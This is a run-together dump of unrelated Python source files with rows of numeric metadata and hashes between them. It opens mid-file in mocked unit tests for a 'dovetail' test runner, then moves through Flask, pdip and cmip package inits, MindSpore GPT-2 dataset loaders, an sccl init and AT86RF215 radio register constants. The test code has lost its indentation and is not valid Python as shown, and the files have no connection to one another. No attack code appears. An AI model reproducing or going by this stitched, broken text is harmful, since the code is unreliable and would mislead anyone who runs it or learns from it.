result = docker_runner._update_config(self.testcase)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('three', 'endpoint_info.json'),
call('conf_path', docker_runner.config_file_name),
call('one', 'two')])
mock_add_info.assert_called_once_with(self.testcase)
mock_render.assert_called_once_with(True, config_item='item')
mock_load.assert_called_once_with('full_task')
self.assertEquals(
{'config_dir': 'one',
'pod_file': 'two',
'full_task_yaml': 'full_value',
'result_dir': 'three'},
result)
@patch('dovetail.test_runner.yaml.safe_load')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.constants')
@patch.object(t_runner.DockerRunner, '_add_testcase_info')
@patch.object(t_runner.DockerRunner, '_render')
def test_update_config_pod_info_no_info(self, mock_render, mock_add_info,
mock_const, mock_path, mock_config,
mock_utils, mock_load):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'config_dir': 'one', 'pod_file': 'two', 'result_dir': 'three'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_path.join.side_effect = ['config_file', 'pod_file']
mock_utils.read_yaml_file.return_value = False
mock_utils.read_plain_file.return_value = True
mock_const.CONF_PATH = 'conf_path'
mock_add_info.return_value = {'config_item': 'item'}
mock_render.return_value = 'full_task'
mock_load.return_value = {'full_task_yaml': 'full_value'}
self.patcher2.stop()
result = docker_runner._update_config(self.testcase)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('three', 'endpoint_info.json'),
call('conf_path', docker_runner.config_file_name),
call('one', 'two')])
mock_add_info.assert_called_once_with(self.testcase)
mock_render.assert_called_once_with(True, config_item='item')
mock_load.assert_called_once_with('full_task')
self.assertEquals(
{'config_dir': 'one',
'pod_file': 'two',
'full_task_yaml': 'full_value',
'result_dir': 'three'},
result)
@patch('dovetail.test_runner.yaml.safe_load')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.constants')
@patch.object(t_runner.DockerRunner, '_add_testcase_info')
@patch.object(t_runner.DockerRunner, '_render')
def test_update_config_pod_info(self, mock_render, mock_add_info,
mock_const, mock_path, mock_config,
mock_utils, mock_load):
t_runner.FunctestRunner.create_log()
mock_config.dovetail_config = {
'config_dir': 'one', 'pod_file': 'two', 'result_dir': 'three'}
docker_runner = t_runner.FunctestRunner(self.testcase)
mock_path.join.side_effect = ['config_file', 'pod_file']
mock_utils.read_yaml_file.return_value = {
'process_info': [
{'key': 'value'}, {'testcase_name': self.testcase_name}
]}
mock_utils.read_plain_file.return_value = True
mock_const.CONF_PATH = 'conf_path'
mock_add_info.return_value = {'config_item': 'item'}
mock_render.return_value = 'full_task'
mock_load.return_value = {'full_task_yaml': 'full_value'}
self.patcher2.stop()
result = docker_runner._update_config(self.testcase)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('three', 'endpoint_info.json'),
call('conf_path', docker_runner.config_file_name),
call('one', 'two')])
mock_add_info.assert_called_once_with(
self.testcase, {'testcase_name': self.testcase_name})
docker_runner.logger.error.assert_called_once_with(
"Need key '{}' in {}".format('testcase_name', {'key': 'value'}))
mock_render.assert_called_once_with(True, config_item='item')
mock_load.assert_called_once_with('full_task')
self.assertEquals(
{'config_dir': 'one',
'pod_file': 'two',
'full_task_yaml': 'full_value',
'result_dir': 'three'},
result)
@patch('__builtin__.open')
@patch('dovetail.test_runner.json')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
def test_shell_run_prepare_cmd(self, mock_path, mock_utils, mock_config,
mock_json, mock_open):
t_runner.ShellRunner.create_log()
docker_runner = t_runner.ShellRunner(self.testcase)
self.testcase.cmds = ['cmd']
self.testcase.pre_condition.return_value = ['cmd']
self.testcase.post_condition.return_value = ['cmd']
self.testcase.prepare_cmd.return_value = True
mock_utils.exec_cmd.return_value = (1, 'error')
mock_path.join.return_value = 'join_path'
mock_config.dovetail_config = {'result_dir': 'result'}
file_obj = Mock()
mock_open.return_value.__enter__.return_value = file_obj
dump_obj = Mock()
mock_json.dumps.return_value = dump_obj
docker_runner.run()
self.testcase.pre_condition.assert_called_once_with()
self.testcase.prepare_cmd.assert_called_once_with(docker_runner.type)
docker_runner.logger.error.assert_called_once_with(
'Failed to execute all pre_condition cmds.')
mock_utils.exec_cmd.assert_has_calls([
call('cmd', docker_runner.logger),
call('cmd', docker_runner.logger),
call('cmd', docker_runner.logger)])
self.testcase.post_condition.assert_called_once_with()
mock_path.join.assert_called_once_with(
'result', self.testcase_name)
docker_runner.logger.debug.assert_called_with(
'Save result: {}'.format('join_path.out'))
mock_open.assert_called_once_with('join_path.out', 'w')
mock_json.dumps.assert_called_once_with(
{'results': [
('cmd', 1, 'error'),
('cmd', 1, 'error'),
('cmd', 1, 'error')],
'pass': 'FAIL'})
file_obj.write.assert_called_once_with(dump_obj)
@patch('__builtin__.open')
@patch('dovetail.test_runner.dt_cfg')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
def test_shell_run_no_prepare_cmd_and_exception(self, mock_path,
mock_utils, mock_config,
mock_open):
t_runner.ShellRunner.create_log()
docker_runner = t_runner.ShellRunner(self.testcase)
self.testcase.cmds = ['cmd']
self.testcase.pre_condition.return_value = ['cmd']
self.testcase.post_condition.return_value = ['cmd']
self.testcase.prepare_cmd.return_value = False
mock_utils.exec_cmd.return_value = (1, 'error')
mock_path.join.return_value = 'join_path'
mock_config.dovetail_config = {'result_dir': 'result'}
mock_open.return_value.__enter__.side_effect = Exception('error')
docker_runner.run()
self.testcase.pre_condition.assert_called_once_with()
self.testcase.prepare_cmd.assert_called_once_with(docker_runner.type)
docker_runner.logger.error.assert_has_calls([
call('Failed to execute all pre_condition cmds.'),
call('Failed to prepare cmd: {}'.format(self.testcase_name))])
mock_utils.exec_cmd.assert_has_calls([
call('cmd', docker_runner.logger),
call('cmd', docker_runner.logger)])
self.testcase.post_condition.assert_called_once_with()
mock_path.join.assert_called_once_with(
'result', self.testcase_name)
docker_runner.logger.debug.assert_called_with(
'Save result: {}'.format('join_path.out'))
mock_open.assert_called_once_with('join_path.out', 'w')
def test_factory_error(self):
self.testcase.validate_type.return_value = 'unknown'
docker_runner = t_runner.TestRunnerFactory()
result = docker_runner.create(self.testcase)
self.assertEquals(None, result)
@patch('dovetail.test_runner.constants')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
def test_k8s_update_config_no_task_template(self, mock_path, mock_utils,
mock_const):
t_runner.FunctestK8sRunner.create_log()
mock_utils.read_plain_file.return_value = None
mock_path.join.side_effect = ['config_file']
mock_const.CONF_PATH = 'conf_path'
docker_runner = t_runner.FunctestK8sRunner(self.testcase)
self.patcher2.stop()
result = docker_runner._update_config(self.testcase, update_pod=False)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('conf_path', docker_runner.config_file_name)])
mock_utils.read_plain_file.assert_has_calls([
call('config_file', docker_runner.logger)])
self.assertEquals(None, result)
@patch('dovetail.test_runner.yaml.safe_load')
@patch('dovetail.test_runner.constants')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.dt_cfg')
@patch.object(t_runner.DockerRunner, '_add_testcase_info')
@patch.object(t_runner.DockerRunner, '_render')
def test_k8s_update_config(self, mock_render, mock_add_info, mock_config,
mock_path, mock_utils, mock_const, mock_load):
t_runner.FunctestK8sRunner.create_log()
mock_utils.read_plain_file.return_value = True
mock_path.join.side_effect = ['config_file', 'config_file']
mock_const.CONF_PATH = 'conf_path'
mock_add_info.return_value = {'config_item': 'item'}
mock_render.return_value = 'full_task'
mock_load.return_value = {'full_task_yaml': 'full_value'}
mock_config.dovetail_config = {
'config_dir': 'one', 'pod_file': 'two'}
docker_runner = t_runner.FunctestK8sRunner(self.testcase)
self.patcher2.stop()
result = docker_runner._update_config(self.testcase, update_pod=False)
self.patcher2.start()
mock_path.join.assert_has_calls([
call('conf_path', docker_runner.config_file_name)])
mock_utils.read_plain_file.assert_has_calls([
call('config_file', docker_runner.logger)])
mock_add_info.assert_has_calls([call(self.testcase)])
mock_render.assert_has_calls([call(True, config_item='item')])
mock_load.assert_has_calls([call('full_task')])
self.assertEquals(
{'config_dir': 'one',
'pod_file': 'two',
'full_task_yaml': 'full_value'},
result)
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.dt_cfg')
def test_init_onapvtprunner_no_env_file(self, mock_config, mock_path,
mock_utils):
t_runner.OnapVtpRunner.create_log()
mock_path.join.side_effect = ['env_file']
mock_config.dovetail_config = {'config_dir': 'one', 'env_file': 'two'}
mock_path.isfile.return_value = False
docker_runner = t_runner.OnapVtpRunner(self.testcase)
mock_path.join.assert_has_calls([call('one', 'two')])
mock_path.isfile.assert_called_once()
docker_runner.logger.error.assert_called_once_with(
'File env_file does not exist.')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.dt_cfg')
def test_init_onapvtprunner(self, mock_config, mock_path, mock_utils):
t_runner.OnapVtpRunner.create_log()
mock_path.join.side_effect = ['env_file']
mock_config.dovetail_config = {'config_dir': 'one', 'env_file': 'two'}
mock_path.isfile.return_value = True
t_runner.OnapVtpRunner(self.testcase)
mock_path.join.assert_has_calls([call('one', 'two')])
mock_path.isfile.assert_called_once()
mock_utils.source_env.assert_called_once_with('env_file')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.dt_cfg')
def test_init_onapvvprunner_no_env_file(self, mock_config, mock_path,
mock_utils):
t_runner.OnapVvpRunner.create_log()
mock_path.join.side_effect = ['env_file']
mock_config.dovetail_config = {'config_dir': 'one', 'env_file': 'two'}
mock_path.isfile.return_value = False
docker_runner = t_runner.OnapVvpRunner(self.testcase)
mock_path.join.assert_has_calls([call('one', 'two')])
mock_path.isfile.assert_called_once()
docker_runner.logger.error.assert_called_once_with(
'File env_file does not exist.')
@patch('dovetail.test_runner.dt_utils')
@patch('dovetail.test_runner.os.path')
@patch('dovetail.test_runner.dt_cfg')
def test_init_onapvvprunner(self, mock_config, mock_path, mock_utils):
t_runner.OnapVvpRunner.create_log()
mock_path.join.side_effect = ['env_file']
mock_config.dovetail_config = {'config_dir': 'one', 'env_file': 'two'}
mock_path.isfile.return_value = True
t_runner.OnapVvpRunner(self.testcase)
mock_path.join.assert_has_calls([call('one', 'two')])
mock_path.isfile.assert_called_once()
mock_utils.source_env.assert_called_once_with('env_file')
| 45.381153 | 79 | 0.657968 | 3,919 | 32,266 | 5.012758 | 0.056902 | 0.060473 | 0.070552 | 0.088979 | 0.867345 | 0.846577 | 0.834004 | 0.818885 | 0.801171 | 0.791296 | 0 | 0.002054 | 0.230614 | 32,266 | 710 | 80 | 45.44507 | 0.789285 | 0.009732 | 0 | 0.744715 | 0 | 0 | 0.183771 | 0.077422 | 0 | 0 | 0 | 0 | 0.19187 | 1 | 0.042276 | false | 0.001626 | 0.004878 | 0 | 0.04878 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a427cbbf5267915cc4b35d7e9060f3811469c75f | 157 | py | Python | app/blueprints/open_main/__init__.py | lvyaoo/wx-open-project | 6f6683c5267fac50b6c8479c148aa1f35cf0f930 | [
"MIT"
] | null | null | null | app/blueprints/open_main/__init__.py | lvyaoo/wx-open-project | 6f6683c5267fac50b6c8479c148aa1f35cf0f930 | [
"MIT"
] | null | null | null | app/blueprints/open_main/__init__.py | lvyaoo/wx-open-project | 6f6683c5267fac50b6c8479c148aa1f35cf0f930 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from flask import Blueprint
bp_open_main = Blueprint('bp_open_main', __name__, static_folder='static')
from . import extensions
| 15.7 | 74 | 0.726115 | 21 | 157 | 5 | 0.666667 | 0.209524 | 0.285714 | 0.361905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007463 | 0.146497 | 157 | 9 | 75 | 17.444444 | 0.776119 | 0.133758 | 0 | 0 | 0 | 0 | 0.134328 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
2d018c98f4cddc28a1b4956990408358c5722fe2 | 324 | py | Python | pdip/integrator/initializer/execution/integration/__init__.py | ahmetcagriakca/pdip | c4c16d5666a740154cabdc6762cd44d98b7bdde8 | [
"MIT"
] | 2 | 2021-12-09T21:07:46.000Z | 2021-12-11T22:18:01.000Z | pdip/integrator/initializer/execution/integration/__init__.py | PythonDataIntegrator/pdip | c4c16d5666a740154cabdc6762cd44d98b7bdde8 | [
"MIT"
] | null | null | null | pdip/integrator/initializer/execution/integration/__init__.py | PythonDataIntegrator/pdip | c4c16d5666a740154cabdc6762cd44d98b7bdde8 | [
"MIT"
] | 3 | 2021-11-15T00:47:00.000Z | 2021-12-17T11:35:45.000Z | from .default_operation_integration_execution_initializer import DefaultOperationIntegrationExecutionInitializer
from .operation_integration_execution_initializer import OperationIntegrationExecutionInitializer
from .operation_integration_execution_initializer_factory import OperationIntegrationExecutionInitializerFactory
| 81 | 112 | 0.953704 | 23 | 324 | 12.956522 | 0.478261 | 0.201342 | 0.291946 | 0.402685 | 0.469799 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 324 | 3 | 113 | 108 | 0.955128 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 10 |
2d1fbf2b32b42f298d8f9e2a2a4be68d03c9b4f3 | 72 | py | Python | cmip/__init__.py | permamodel/cmip | 1796f26f4785c723e68424360145c6f293886fea | [
"MIT"
] | null | null | null | cmip/__init__.py | permamodel/cmip | 1796f26f4785c723e68424360145c6f293886fea | [
"MIT"
] | 5 | 2018-01-17T21:34:43.000Z | 2018-05-18T14:58:39.000Z | cmip/__init__.py | permamodel/cmip | 1796f26f4785c723e68424360145c6f293886fea | [
"MIT"
] | null | null | null |
#import cmip
import cmip_model
import bmi_cmip
import cmip_utils as cu
| 12 | 23 | 0.833333 | 13 | 72 | 4.384615 | 0.538462 | 0.526316 | 0.491228 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152778 | 72 | 5 | 24 | 14.4 | 0.934426 | 0.152778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
2d34cedd02f3f10d8977c68590e3e8c4931b9358 | 6,219 | py | Python | src/dataset.py | viewsetting/GPT2 | 0ee3b5c327ccbbb306899c3f3f5d258c259c348e | [
"Apache-2.0"
] | 4 | 2021-01-02T09:42:42.000Z | 2021-01-11T12:24:34.000Z | src/dataset.py | viewsetting/MindSpore-GPT2 | 0ee3b5c327ccbbb306899c3f3f5d258c259c348e | [
"Apache-2.0"
] | null | null | null | src/dataset.py | viewsetting/MindSpore-GPT2 | 0ee3b5c327ccbbb306899c3f3f5d258c259c348e | [
"Apache-2.0"
] | null | null | null | import os
import numpy as np
import mindspore.common.dtype as mstype
import mindspore.dataset as de
from .finetune_eval_config import gpt2_net_cfg
import mindspore.dataset.transforms.c_transforms as C
from mindspore.communication.management import init, get_rank, get_group_size
def create_language_model_dataset(device_num=1, repeat_count=1, rank_id=0, do_shuffle=True,
dataset_path="/data/tju/src/mindspore-dataset/wikitext2-train-mindrecord"):
type_cast_op = C.TypeCast(mstype.int32)
ds = de.MindDataset(dataset_path,
columns_list=["input_ids", "input_mask", "label_ids"],
shuffle=do_shuffle,
num_shards=device_num,
shard_id=rank_id)
print("batch_size: {}".format(gpt2_net_cfg.batch_size))
ds = ds.map(input_columns="input_ids", operations=type_cast_op)
ds = ds.map(input_columns="input_mask", operations=type_cast_op)
ds = ds.map(input_columns="label_ids", operations=type_cast_op)
# # apply shuffle operation
# buffer_size = 960
# ds = ds.shuffle(buffer_size=buffer_size)
# apply batch operations
ds = ds.batch(gpt2_net_cfg.batch_size, drop_remainder=True)
ds = ds.repeat(repeat_count)
print("dataset size: {}".format(ds.get_dataset_size()))
print("repeat count: {}".format(ds.get_repeat_count()))
print("output shape: {}".format(ds.output_shapes()))
print("output type: {}".format(ds.output_types()))
print("============== create dataset successful ===============")
# print(ds)
return ds
def create_cnn_dailymail_dataset(device_num=1, repeat_count=1, rank_id=0, do_shuffle=True,
dataset_path="/data/tju/src/mindspore-dataset/cnn_dailymail-train-mindrecord"):
type_cast_op = C.TypeCast(mstype.int32)
ds = de.MindDataset(dataset_path,
columns_list=["input_ids", "input_mask", "label_ids"],
shuffle=do_shuffle,
num_shards=device_num,
shard_id=rank_id)
print("batch_size: {}".format(gpt2_net_cfg.batch_size))
ds = ds.map(input_columns="input_ids", operations=type_cast_op)
ds = ds.map(input_columns="input_mask", operations=type_cast_op)
ds = ds.map(input_columns="label_ids", operations=type_cast_op)
# # apply shuffle operation
# buffer_size = 960
# ds = ds.shuffle(buffer_size=buffer_size)
# apply batch operations
ds = ds.batch(gpt2_net_cfg.batch_size, drop_remainder=True)
ds = ds.repeat(repeat_count)
print("dataset size: {}".format(ds.get_dataset_size()))
print("repeat count: {}".format(ds.get_repeat_count()))
print("output shape: {}".format(ds.output_shapes()))
print("output type: {}".format(ds.output_types()))
print("============== create dataset successful ===============")
# print(ds)
return ds
def create_translation_dataset(repeat_count=1, do_shuffle=True, dataset_path=None, target="Ascend"):
#device_num = get_group_size()
#rank_id = get_rank()
# print("*"*30+"[create_translation_dataset] device_num:{} rank_id:{}".format(device_num,rank_id))
device_num, rank_id = _get_rank_info()
print("-------| [dataset.py] {} (device), {} (target), {} (device numbers) |------".format(rank_id, target, device_num))
type_cast_op = C.TypeCast(mstype.int32)
ds = de.MindDataset(dataset_path,
columns_list=["input_ids", "input_mask", "label_ids"],
shuffle=do_shuffle,
num_shards=device_num,
shard_id=rank_id)
print("batch_size: {}".format(gpt2_net_cfg.batch_size))
ds = ds.map(input_columns="input_ids", operations=type_cast_op)
ds = ds.map(input_columns="input_mask", operations=type_cast_op)
ds = ds.map(input_columns="label_ids", operations=type_cast_op)
# # apply shuffle operation
# buffer_size = 960
# ds = ds.shuffle(buffer_size=buffer_size)
# apply batch operations
ds = ds.batch(gpt2_net_cfg.batch_size, drop_remainder=True)
ds = ds.repeat(repeat_count)
print("dataset size: {}".format(ds.get_dataset_size()))
print("repeat count: {}".format(ds.get_repeat_count()))
print("output shape: {}".format(ds.output_shapes()))
print("output type: {}".format(ds.output_types()))
print("============== create dataset successful ===============")
# print(ds)
return ds
def create_translation_dataset_single(device_num=1, repeat_count=1, rank_id=0, do_shuffle=True, dataset_path=None):
#device_num = get_group_size()
#rank_id = get_rank()
# print("*"*30+"[create_translation_dataset] device_num:{} rank_id:{}".format(device_num,rank_id))
type_cast_op = C.TypeCast(mstype.int32)
ds = de.MindDataset(dataset_path,
columns_list=["input_ids", "input_mask", "label_ids"],
shuffle=do_shuffle,
num_shards=device_num,
shard_id=rank_id)
print("batch_size: {}".format(gpt2_net_cfg.batch_size))
ds = ds.map(input_columns="input_ids", operations=type_cast_op)
ds = ds.map(input_columns="input_mask", operations=type_cast_op)
ds = ds.map(input_columns="label_ids", operations=type_cast_op)
# # apply shuffle operation
# buffer_size = 960
# ds = ds.shuffle(buffer_size=buffer_size)
# apply batch operations
ds = ds.batch(gpt2_net_cfg.batch_size, drop_remainder=True)
ds = ds.repeat(repeat_count)
print("dataset size: {}".format(ds.get_dataset_size()))
print("repeat count: {}".format(ds.get_repeat_count()))
print("output shape: {}".format(ds.output_shapes()))
print("output type: {}".format(ds.output_types()))
print("============== create dataset successful ===============")
# print(ds)
return ds
def _get_rank_info():
"""
get rank size and rank id
"""
rank_size = int(os.environ.get("RANK_SIZE", 1))
if rank_size > 1:
rank_size = get_group_size()
rank_id = get_rank()
else:
rank_size = 1
rank_id = 0
return rank_size, rank_id | 40.383117 | 124 | 0.643351 | 816 | 6,219 | 4.596814 | 0.117647 | 0.025593 | 0.042655 | 0.03839 | 0.858438 | 0.858438 | 0.849907 | 0.843242 | 0.843242 | 0.843242 | 0 | 0.009764 | 0.209519 | 6,219 | 154 | 125 | 40.383117 | 0.753255 | 0.127352 | 0 | 0.75 | 0 | 0 | 0.179454 | 0.022292 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052083 | false | 0 | 0.072917 | 0 | 0.177083 | 0.260417 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
745d1ef8bce8b99d4daf331dddd355b3c91dd278 | 181 | py | Python | sccl/__init__.py | cowanmeg/sccl | 2d1a34e45982471d3df32ad2974ba86657186517 | [
"MIT"
] | 26 | 2021-06-15T00:54:14.000Z | 2022-03-26T13:04:24.000Z | sccl/__init__.py | cowanmeg/sccl | 2d1a34e45982471d3df32ad2974ba86657186517 | [
"MIT"
] | 5 | 2021-05-25T23:32:48.000Z | 2022-02-16T02:37:06.000Z | sccl/__init__.py | cowanmeg/sccl | 2d1a34e45982471d3df32ad2974ba86657186517 | [
"MIT"
] | 8 | 2021-06-30T23:07:44.000Z | 2022-03-03T23:17:28.000Z | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from sccl.autosynth import init
from sccl.autosynth import ndv2_perm
from sccl.autosynth import Collective
| 25.857143 | 38 | 0.81768 | 25 | 181 | 5.88 | 0.68 | 0.163265 | 0.346939 | 0.469388 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006369 | 0.132597 | 181 | 6 | 39 | 30.166667 | 0.929936 | 0.375691 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
77d210ae34ced7def1e654d008f35f5e749ce7e0 | 54,939 | py | Python | raspberry/at86rf215_defs.py | openwsn-berkeley/range_test | 20345bd20feab2fa69f444aba0d3ad6176cd6b0f | [
"BSD-2-Clause"
] | 2 | 2020-01-08T19:22:19.000Z | 2020-06-03T12:19:56.000Z | raspberry/at86rf215_defs.py | openwsn-berkeley/range_test | 20345bd20feab2fa69f444aba0d3ad6176cd6b0f | [
"BSD-2-Clause"
] | 23 | 2017-01-16T13:57:07.000Z | 2017-06-22T12:53:22.000Z | raspberry/at86rf215_defs.py | openwsn-berkeley/range_test | 20345bd20feab2fa69f444aba0d3ad6176cd6b0f | [
"BSD-2-Clause"
] | 2 | 2016-12-16T11:09:27.000Z | 2019-10-29T11:31:36.000Z | """
Register identifiers for the AT86RF215 sub-GHz radio.
\author Jonathan Munoz (jonathan.munoz@inria.fr), January 2017
"""
# MACROS
IRQS_TXFE_MASK = 0x10
IRQS_TRXRDY_MASK = 0x02
IRQS_RXFS_MASK = 0x01
IRQS_RXFE_MASK = 0x02
# commands
CMD_RF_NOP = 0x0
CMD_RF_SLEEP = 0x1
CMD_RF_TRXOFF = 0x2
CMD_RF_TXPREP = 0x3
CMD_RF_TX = 0x4
CMD_RF_RX = 0x5
CMD_RF_RESET = 0x7
# states
RF_STATE_TRXOFF = 0x2
RF_STATE_TXPREP = 0x3
RF_STATE_TX = 0x4
RF_STATE_RX = 0x5
RF_STATE_TRANSITION = 0x6
RF_STATE_RESET = 0x7
# Radio IRQ Status
IRQS_WAKEUP = 0x01
IRQS_TRXRDY = 0x02
IRQS_EDC = 0x04
IRQS_BATLOW = 0x08
IRQS_TRXERR = 0x10
IRQS_IQIFSF = 0x20
# baseband IRQ Status
IRQS_RXFS = 0x01
IRQS_RXFE = 0x02
IRQS_RXAM = 0x04
IRQS_RXEM = 0x08
IRQS_TXFE = 0x10
IRQS_AGCH = 0x20
IRQS_AGCR = 0x40
IRQS_FBLI = 0x80
# reset command
RST_CMD = 0x07
# register addresses (16-bit)
RG_RF09_IRQS = [0x00, 0x00]
RG_RF24_IRQS = [0x00, 0x01]
RG_BBC0_IRQS = [0x00, 0x02]
RG_BBC1_IRQS = [0x00, 0x03]
RG_RF_RST = [0x00, 0x05]
RG_RF_CFG = [0x00, 0x06]
RG_RF_CLKO = [0x00, 0x07]
RG_RF_BMDVC = [0x00, 0x08]
RG_RF_XOC = [0x00, 0x09]
RG_RF_IQIFC0 = [0x00, 0x0A]
RG_RF_IQIFC1 = [0x00, 0x0B]
RG_RF_IQIFC2 = [0x00, 0x0C]
RG_RF_PN = [0x00, 0x0D]
RG_RF_VN = [0x00, 0x0E]
RG_RF09_IRQM = [0x01, 0x00]
RG_RF09_AUXS = [0x01, 0x01]
RG_RF09_STATE = [0x01, 0x02]
RG_RF09_CMD = [0x01, 0x03]
RG_RF09_CS = [0x01, 0x04]
RG_RF09_CCF0L = [0x01, 0x05]
RG_RF09_CCF0H = [0x01, 0x06]
RG_RF09_CNL = [0x01, 0x07]
RG_RF09_CNM = [0x01, 0x08]
RG_RF09_RXBWC = [0x01, 0x09]
RG_RF09_RXDFE = [0x01, 0x0A]
RG_RF09_AGCC = [0x01, 0x0B]
RG_RF09_AGCS = [0x01, 0x0C]
RG_RF09_RSSI = [0x01, 0x0D]
RG_RF09_EDC = [0x01, 0x0E]
RG_RF09_EDD = [0x01, 0x0F]
RG_RF09_EDV = [0x01, 0x10]
RG_RF09_RNDV = [0x01, 0x11]
RG_RF09_TXCUTC = [0x01, 0x12]
RG_RF09_TXDFE = [0x01, 0x13]
RG_RF09_PAC = [0x01, 0x14]
RG_RF24_IRQM = [0x02, 0x00]
RG_RF24_AUXS = [0x02, 0x01]
RG_RF24_STATE = [0x02, 0x02]
RG_RF24_CMD = [0x02, 0x03]
RG_RF24_CS = [0x02, 0x04]
RG_RF24_CCF0L = [0x02, 0x05]
RG_RF24_CCF0H = [0x02, 0x06]
RG_RF24_CNL = [0x02, 0x07]
RG_RF24_CNM = [0x02, 0x08]
RG_RF24_RXBWC = [0x02, 0x09]
RG_RF24_RXDFE = [0x02, 0x0A]
RG_RF24_AGCC = [0x02, 0x0B]
RG_RF24_AGCS = [0x02, 0x0C]
RG_RF24_RSSI = [0x02, 0x0D]
RG_RF24_EDC = [0x02, 0x0E]
RG_RF24_EDD = [0x02, 0x0F]
RG_RF24_EDV = [0x02, 0x10]
RG_RF24_RNDV = [0x02, 0x11]
RG_RF24_TXCUTC = [0x02, 0x12]
RG_RF24_TXDFE = [0x02, 0x13]
RG_RF24_PAC = [0x02, 0x14]
RG_BBC0_IRQM = [0x03, 0x00]
RG_BBC0_PC = [0x03, 0x01]
RG_BBC0_PS = [0x03, 0x02]
RG_BBC0_RXFLL = [0x03, 0x04]
RG_BBC0_RXFLH = [0x03, 0x05]
RG_BBC0_TXFLL = [0x03, 0x06]
RG_BBC0_TXFLH = [0x03, 0x07]
RG_BBC0_FBLL = [0x03, 0x08]
RG_BBC0_FBLH = [0x03, 0x09]
RG_BBC0_FBLIL = [0x03, 0x0A]
RG_BBC0_FBLIH = [0x03, 0x0B]
RG_BBC0_OFDMPHRTX = [0x03, 0x0C]
RG_BBC0_OFDMPHRRX = [0x03, 0x0D]
RG_BBC0_OFDMC = [0x03, 0x0E]
RG_BBC0_OFDMSW = [0x03, 0x0F]
RG_BBC0_OQPSKC0 = [0x03, 0x10]
RG_BBC0_OQPSKC1 = [0x03, 0x11]
RG_BBC0_OQPSKC2 = [0x03, 0x12]
RG_BBC0_OQPSKC3 = [0x03, 0x13]
RG_BBC0_OQPSKPHRTX = [0x03, 0x14]
RG_BBC0_OQPSKPHRRX = [0x03, 0x15]
RG_BBC0_FSKC0 = [0x03, 0x60]
RG_BBC0_FSKC1 = [0x03, 0x61]
RG_BBC0_FSKC2 = [0x03, 0x62]
RG_BBC0_FSKC3 = [0x03, 0x63]
RG_BBC0_FSKC4 = [0x03, 0x64]
RG_BBC0_FSKPHRTX = [0x03, 0x6A]
RG_BBC0_FSKPHRRX = [0x03, 0x6B]
